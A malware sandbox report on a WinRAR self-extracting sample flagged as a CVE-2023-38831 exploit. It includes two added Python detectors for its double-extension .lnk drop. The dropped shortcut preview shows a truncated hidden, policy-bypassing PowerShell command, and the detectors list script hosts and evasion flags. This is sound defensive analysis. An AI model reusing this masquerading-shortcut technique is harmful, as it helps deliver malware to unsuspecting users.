
Windows Analysis Report
oJK2UKac7G.exe

Overview

General Information

Sample name: oJK2UKac7G.exe (renamed because the original name is a hash value)
Original sample name: d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6.exe
Analysis ID: 1522694
MD5: f708711b3c0f40e0202645136934ee1a
SHA1: 6d38fa14ba708bd26ab8462258c6fa1afd7e7d97
SHA256: d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
Tags: exe, UAC-0099, user-JAMESWT_MHT

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious LNK Double Extension File Created
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process tree:
  • System is w10x64
  • oJK2UKac7G.exe (PID: 2820, cmdline: "C:\Users\user\Desktop\oJK2UKac7G.exe", MD5: F708711B3C0F40E0202645136934EE1A)
  • cleanup

No configs have been found
No yara matches
Sigma rule matched: Suspicious LNK Double Extension File Created (authors: Nasreddine Bencherchali (Nextron Systems), frack113)
  Source: File created
  Data: EventID: 11, Image: C:\Users\user\Desktop\oJK2UKac7G.exe, ProcessId: 2820, TargetFilename: C:\Users\user\Desktop\???i????-623-6341-11.docx.lnk
No Suricata rule has matched
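The Sigma hit above keys on a Sysmon FileCreate event (Event ID 11) whose TargetFilename ends in a document extension followed by .lnk. On its own that is noisy; paired with the same process first writing WinRAR's `__tmp_rar_sfx_access_check_` probe file (see the "File created" entries further down in this report) it pins the drop to an SFX extraction. The script below is an added example, not part of the report or of the Sigma rule: it reads JSON-lines Sysmon events (a constructed sample is embedded; the field names are Sysmon's, while the benign explorer.exe line and all file names are invented) and reports any process that did both.

```python
import json
import re
from collections import defaultdict

# Constructed Sysmon FileCreate (Event ID 11) records, one JSON object per line,
# modelled on the report's Sigma hit (PID 2820). The explorer.exe line is a benign
# shortcut to a document, included to show that it does not fire the correlation.
SAMPLE_LOG = r"""
{"EventID": 11, "ProcessId": 2820, "Image": "C:\\Users\\user\\Desktop\\oJK2UKac7G.exe", "TargetFilename": "C:\\Users\\user\\Desktop\\__tmp_rar_sfx_access_check_4150078"}
{"EventID": 11, "ProcessId": 2820, "Image": "C:\\Users\\user\\Desktop\\oJK2UKac7G.exe", "TargetFilename": "C:\\Users\\user\\Desktop\\constructed-name.docx.lnk"}
{"EventID": 11, "ProcessId": 4100, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\user\\Desktop\\notes.docx.lnk"}
{"EventID": 1, "ProcessId": 2820, "Image": "C:\\Users\\user\\Desktop\\oJK2UKac7G.exe"}
"""

# Document-looking extension immediately followed by .lnk (the masquerade the Sigma rule targets).
DOUBLE_EXT_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|txt|rtf|jpe?g|png)\.lnk$", re.I)
# WinRAR's SFX stub writes this probe file to test that the destination is writable.
SFX_MARKER = "__tmp_rar_sfx_access_check_"


def parse_log(text):
    """Decode JSON-lines input into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_double_extension_lnk(path):
    return DOUBLE_EXT_LNK.search(path) is not None


def is_sfx_access_check(path):
    return path.rsplit("\\", 1)[-1].startswith(SFX_MARKER)


def correlate(events):
    """Return one finding per process that wrote both the SFX probe file and a
    double-extension .lnk. Either event alone is only a weak signal."""
    by_pid = defaultdict(lambda: {"sfx": None, "lnk": [], "image": None})
    for ev in events:
        if ev.get("EventID") != 11:
            continue
        rec = by_pid[ev["ProcessId"]]
        rec["image"] = ev.get("Image")
        target = ev.get("TargetFilename", "")
        if is_sfx_access_check(target):
            rec["sfx"] = target
        elif is_double_extension_lnk(target):
            rec["lnk"].append(target)
    findings = []
    for pid, rec in by_pid.items():
        if rec["sfx"] and rec["lnk"]:
            findings.append({"ProcessId": pid, "Image": rec["image"],
                             "sfx_marker": rec["sfx"], "lnk_files": rec["lnk"]})
    return findings


if __name__ == "__main__":
    for f in correlate(parse_log(SAMPLE_LOG)):
        print(f"PID {f['ProcessId']} ({f['Image']}): SFX extraction dropped {f['lnk_files']}")
```

The probe file is deleted again by the stub almost immediately, so the FileCreate event is the only durable trace of it; a detection that only looks at files still on disk will miss the pairing.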


AV Detection

Source: oJK2UKac7G.exe | Avira: detected
Source: oJK2UKac7G.exe | ReversingLabs: Detection: 60%
Source: oJK2UKac7G.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: oJK2UKac7G.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: oJK2UKac7G.exe | Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C9BA94: FindFirstFileW, FindFirstFileW, GetLastError, FindNextFileW, GetLastError
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CBC4F8: FindFirstFileExA
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAD410: SendDlgItemMessageW, EndDialog, GetDlgItem, SetFocus, SetDlgItemTextW, SendDlgItemMessageW, FindFirstFileW, _swprintf, SetDlgItemTextW, FindClose, _swprintf, SetDlgItemTextW, SendDlgItemMessageW, _swprintf, SetDlgItemTextW, _swprintf, SetDlgItemTextW
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAB080: SetWindowLongW, NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C97AAF: __EH_prolog, _wcslen, _wcslen, CreateFileW, CloseHandle, CreateDirectoryW, CreateFileW, DeviceIoControl, CloseHandle, GetLastError, RemoveDirectoryW, DeleteFileW
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C992C6
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA7DCC
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA5001
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA02F7
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB6298
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA8243
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA5272
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA13F6
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB64C7
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA741E
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CBE5F0
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA55A0
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA07A0
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CA889F
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C9D833
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C9395A
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C94A8E
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CBEA9E
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CC2BA4
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C9FCCC
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C92EB6
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function: String function 00CAFFC0 appears 56 times
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function: String function 00CB0790 appears 31 times
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function: String function 00CAFEEC appears 42 times
Source: oJK2UKac7G.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal56.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C97727: GetLastError, FormatMessageW
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAB0BE: CLSIDFromString, CoCreateInstance
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAB6C2: FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4150078
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Command line argument: sfxname (0_2_00CAF04C)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Command line argument: sfxstime (0_2_00CAF04C)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Command line argument: STARTDLG (0_2_00CAF04C)
Source: oJK2UKac7G.exe | Static PE information: Section .text: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: oJK2UKac7G.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | File read: C:\Users\user\Desktop\oJK2UKac7G.exe
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Sections loaded (in order): api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, ieframe.dll, iertutil.dll, netapi32.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, dataexchange.dll, d3d11.dll, dcomp.dll, dxgi.dll, twinapi.appcore.dll, urlmon.dll, srvcli.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll (loaded 3 times), msiso.dll, windows.storage.dll, wldp.dll, mshtml.dll, powrprof.dll, umpdc.dll, srpapi.dll, msimtf.dll, d2d1.dll, dwrite.dll, resourcepolicyclient.dll, d3d10warp.dll, dxcore.dll, secur32.dll, mlang.dll, propsys.dll, wininet.dll, profapi.dll, uiautomationcore.dll, winmm.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oJK2UKac7G.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: oJK2UKac7G.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oJK2UKac7G.exe | Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Source: oJK2UKac7G.exe | Static PE information: Data directory IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: oJK2UKac7G.exe | Static PE information: Data directory IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: oJK2UKac7G.exe | Static PE information: Data directory IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: oJK2UKac7G.exe | Static PE information: Data directory IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: oJK2UKac7G.exe | Static PE information: Data directory IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4150078
Source: oJK2UKac7G.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB07E0: push ecx; ret (at 0_2_00CB07F3)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAFEEC: push eax; ret (at 0_2_00CAFF0A)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Process information set: NOOPENFILEERRORBOX (repeated 6 times)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Memory allocated: 73A0000, memory reserve, memory write watch
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C9BA94: FindFirstFileW, FindFirstFileW, GetLastError, FindNextFileW, GetLastError
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CBC4F8: FindFirstFileExA
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAD410: SendDlgItemMessageW, EndDialog, GetDlgItem, SetFocus, SetDlgItemTextW, SendDlgItemMessageW, FindFirstFileW, _swprintf, SetDlgItemTextW, FindClose, _swprintf, SetDlgItemTextW, SendDlgItemMessageW, _swprintf, SetDlgItemTextW, _swprintf, SetDlgItemTextW
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAF81F: VirtualQuery, GetSystemInfo
Source: oJK2UKac7G.exe, 00000000.00000002.2183199544.000000000BA90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | API call chain: ExitProcess graph end node (graph_0-25514)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB09FA: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB91A0: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CBD1E0: GetProcessHeap
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB09FA: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB0B8D: SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB0D7A: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB4FDF: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CB0816: cpuid
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAC083: GetLocaleInfoW, GetNumberFormatW
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation (repeated 3 times)
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00CAF04C: GetCommandLineW, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, CloseHandle, GetModuleFileNameW, SetEnvironmentVariableW, GetLocalTime, _swprintf, SetEnvironmentVariableW, GetModuleHandleW, LoadIconW, DialogBoxParamW, Sleep, DeleteObject, DeleteObject, CloseHandle
Source: C:\Users\user\Desktop\oJK2UKac7G.exe | Code function 0_2_00C9C365: GetVersionExW
MITRE ATT&CK techniques matched by signatures (number of matching signatures in parentheses)

  • Execution: Command and Scripting Interpreter (2)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: DLL Side-Loading (1)
  • Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1)
  • Discovery: System Time Discovery (1), Security Software Discovery (21), Virtualization/Sandbox Evasion (1), File and Directory Discovery (2), System Information Discovery (34)
  • Collection: Archive Collected Data (1)
  • Command and Control: Encrypted Channel (1)
  • No techniques matched for Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact
Antivirus detections

Source          Detection  Scanner        Label
oJK2UKac7G.exe  61%        ReversingLabs  Win32.Exploit.CVE-2023-38831
oJK2UKac7G.exe  100%       Avira          EXP/LNK.Agent.ujrxw

No Antivirus matches for the remaining categories
No contacted domains info
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1522694
Start date and time:2024-09-30 15:35:27 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:oJK2UKac7G.exe
renamed because original name is a hash value
Original Sample Name:d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6.exe
Detection:MAL
Classification:mal56.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 119
  • Number of non-executed functions: 96
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: oJK2UKac7G.exe
No simulations
No context
Process: C:\Users\user\Desktop\oJK2UKac7G.exe
File Type: MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Tue Dec 5 07:31:59 2023, mtime=Tue Dec 5 07:31:59 2023, atime=Tue Dec 5 07:31:59 2023, length=0, window=hide
Category: dropped
Size (bytes): 7271
Entropy (8bit): 6.070389175338264
Encrypted: false
SSDEEP: 192:8WuGpe8SDQRDKx4yzWRIxPdUlDG4UteRefk82v87LnAX:IGM8BDs4BEUGWwL7LnAX
MD5: EB6BF5CE7BA1FFEDE0DC9289021CA87C
SHA1: FE47CBFDB19F09440466BC2E2F5329990288C907
SHA-256: 0EEC5A7373B28A991831D9BE1E30976CEB057E5B701E732372524F1A50255C72
SHA-512: EBC08B36F05C0ABFA1F33D00BFCCB0E007E47943CCB79EE8AEFF1B471F616F16565BB9DC947527E1C7C6E94A2E29ACD53A1A65A7EC3DA7E9BBED573E0C320430
Malicious: false
Reputation: low
Preview: L..................Fe.........U.U'....U.U'....U.U'...............................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F.......-w hidden -nop -noni -exec bypass -c $temp=' [preview truncated]
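The dropped file is a Shell Link whose preview shows it resolving to windows\system32\WindowsPowershell\v1.0\powershell.exe and passing `-w hidden -nop -noni -exec bypass -c $temp=` (the rest of the command is truncated in the report). To pull those fields out of an .lnk without opening it on a Windows host, the parser below walks the MS-SHLLINK layout: the fixed 76-byte ShellLinkHeader, the optional LinkTargetIDList and LinkInfo blocks, then the StringData strings in their fixed order. This is an added example, not code from the report or from the sandbox; the shortcut it builds for itself is constructed (the name, relative path and placeholder argument string are assumptions, not the real dropped file), and the triage rules are one analyst's heuristics rather than the Sigma rule that fired.

```python
import struct

# ShellLinkHeader constants (MS-SHLLINK): fixed LinkCLSID and LinkFlags bits.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight


def parse_lnk(data):
    """Read LinkFlags/ShowCommand, skip the ID list and LinkInfo, decode StringData."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_cmd = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + item IDs + terminator
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "show_command": show_cmd}
    for bit, key in STRING_FIELDS:               # each string: CountCharacters then chars, no NUL
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return out


def triage(path, lnk):
    """Reasons this shortcut looks like a dropper stage rather than a user-made shortcut."""
    reasons = []
    name = path.rsplit("\\", 1)[-1].lower()
    if name.endswith(".lnk") and name.count(".") >= 2:
        reasons.append("double extension masquerading as a document")
    target = (lnk.get("relative_path") or "").lower()
    if target.endswith(("powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe")):
        reasons.append(f"target is a script host: {target}")
    args = lnk.get("arguments", "").lower()
    for marker in ("-exec bypass", "-nop", "-noni", "-w hidden", "-enc"):
        if marker in args:
            reasons.append(f"argument {marker!r}")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised (SW_SHOWMINNOACTIVE)")
    return reasons


def build_sample_lnk(target, arguments):
    """Construct a minimal Unicode .lnk: header, one-item ID list, Name, RelativePath, Arguments."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x20)
    header += b"\x00" * 24                                   # creation/access/write FILETIMEs
    header += struct.pack("<IiIH", 0, 0, SW_SHOWMINNOACTIVE, 0) + b"\x00" * 10
    item = struct.pack("<H", 6) + b"\x00" * 4                # one opaque ItemID (size includes itself)
    id_list = struct.pack("<H", len(item) + 2) + item + b"\x00\x00"

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + id_list + s("Document") + s(target) + s(arguments)


# Constructed stand-in for the dropped file; the real argument string is truncated in the report.
SAMPLE_PATH = r"C:\Users\user\Desktop\constructed-name.docx.lnk"
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -noni -exec bypass -c $temp='constructed placeholder'")

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["relative_path"], parsed["arguments"])
    for reason in triage(SAMPLE_PATH, parsed):
        print(" -", reason)
```

The real sample stores the PowerShell path in the LinkTargetIDList rather than (or as well as) RelativePath, which this parser skips over; on such files the target has to be recovered from the ID list's shell items, and the arguments string remains the reliable field.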
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.739366892065669
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:oJK2UKac7G.exe
File size:331'935 bytes
MD5:f708711b3c0f40e0202645136934ee1a
SHA1:6d38fa14ba708bd26ab8462258c6fa1afd7e7d97
SHA256:d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
SHA512:01469c1a56b996630039fa22c410666339f6ce8aa6594c039738806295647dc4b1a51f7216c8df064ff7b24010e1f8934da30ac80ec077b4e9f7cdcac920d5a1
SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45qd:ntH5NLaAdDhAAEIFcWX+t4od
TLSH:1164B0027AC585B2D57328331A359F20A67D7C301F758EDB9394695EDE321C09B32BA7
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.
Icon Hash:1515d4d4442f2d2d
Entrypoint:0x420780
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:0ae9e38912ff6bd742a1b9e5c003576a
Instruction
call 00007F21E856102Bh
jmp 00007F21E85609DDh
int3
int3
int3
int3
int3
int3
push 00423A80h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004407A8h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F21E8553871h
push 0043D14Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F21E8563685h
int3
jmp 00007F21E8565558h
push ebp
mov ebp, esp
and dword ptr [00463D58h], 00000000h
sub esp, 24h
or dword ptr [004407A0h], 01h
push 0000000Ah
call dword ptr [004341C4h]
test eax, eax
je 00007F21E8560D12h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
Programming Language:
  • [ C ] VS2008 SP1 build 30729
  • [IMP] VS2008 SP1 build 30729
Name                                 Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         0x3e380          0x34          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT         0x3e3b4          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       0x66000          0xdff8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY       0x0              0x0
